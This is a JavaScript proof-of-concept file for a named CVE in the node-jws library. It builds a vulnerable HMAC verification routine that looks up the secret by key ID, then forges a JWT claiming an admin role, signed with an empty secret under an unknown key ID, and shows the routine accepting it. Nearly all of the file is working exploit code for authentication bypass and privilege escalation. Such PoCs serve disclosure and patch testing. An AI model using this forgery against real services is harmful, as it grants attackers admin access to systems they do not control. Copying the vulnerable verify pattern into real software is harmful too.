// CVE-2025-65945 PoC: node-jws HMAC Signature Bypass
// Affected: jws <= 3.2.2 and 4.0.0 | Fixed: 3.2.3 and 4.0.1

const jws = require("jws");
const crypto = require("crypto");

const secretStore = {
  "api-key-1": "production-secret-abc123",
};

const base64url = (data) =>
  Buffer.from(typeof data === "string" ? data : JSON.stringify(data))
    .toString("base64url");

function forgeToken(payload, keyId, secret) {
  const header = base64url({ alg: "HS256", kid: keyId });
  const body = base64url(payload);
  const signingInput = `${header}.${body}`;
  const signature = crypto
    .createHmac("sha256", secret)
    .update(signingInput)
    .digest("base64url");
  return `${signingInput}.${signature}`;
}

function vulnerableVerify(token) {
  return new Promise((resolve, reject) => {
    const { header } = jws.decode(token);
    const secret = secretStore[header.kid];
    const verifier = jws.createVerify({ algorithm: "HS256", signature: token });
    verifier.on("done", resolve);
    verifier.on("error", reject);
    verifier.secret.end(secret);
  });
}

const legitToken = jws.sign({
  header: { alg: "HS256", kid: "api-key-1" },
  payload: JSON.stringify({ userId: "user123", role: "user" }),
  secret: secretStore["api-key-1"],
});

const forgedToken = forgeToken(
  { userId: "attacker", role: "admin" },
  "unknown-key",
  ""
);

(async () => {
  console.log("Legitimate token valid:", await vulnerableVerify(legitToken));
  console.log("Forged token valid:", await vulnerableVerify(forgedToken));
  if (await vulnerableVerify(forgedToken)) {
    console.log("EXPLOIT SUCCESSFUL: Signature bypass with empty secret");
  }
})();
